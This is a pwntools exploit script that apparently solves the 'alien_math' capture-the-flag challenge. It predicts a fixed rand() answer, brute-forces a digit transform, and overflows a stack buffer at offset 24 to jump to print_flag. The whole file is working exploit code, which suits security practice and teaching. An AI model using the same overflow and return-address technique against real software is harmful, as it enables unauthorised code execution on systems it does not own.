from pwn import *


# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Specify GDB script here (breakpoints etc)
gdbscript = '''
init-pwndbg
break second_question_function
continue
'''.format(**locals())

# Binary filename
exe = './alien_math'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Change logging level to help with debugging (warning/info/debug)
context.log_level = 'debug'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

# Start program
io = start()

# First question - rand() is 0x6b8b4567 every time..
io.sendlineafter('What is the square root of zopnol?', '1804289383')

# Second question - needs to equal 7759406485255323229225
target = "7759406485255323229225"
user_input = "7"

# For each position, try every digit (ASCII 48-57) until the
# transformed value matches the next character of the target
for i in range(len(target) - 1):
    for j in range(48, 58):
        current_char = ord(target[i])
        next_char = ord(target[i]) + i
        v1 = j - 48
        r = (12 * (next_char - 48) - 4 + 48 * (current_char - 48) - (next_char - 48)) % 10
        if target[i + 1] == chr((v1 + r) % 10 + 48):
            user_input += chr(j)
            break

io.sendlineafter('How many tewgrunbs are in a qorbnorbf?', str(user_input))

# Calculated in GDB with cyclic pattern
offset = 24

# Build the payload
payload = flat({
    offset: [
        elf.symbols.print_flag
    ]
})

# Third question - BoF (offset = 24)
io.sendlineafter('How long does it take for a toblob of energy to be transferred between two quantum entangled salwzoblrs?', payload)

# Got Shell?
io.interactive()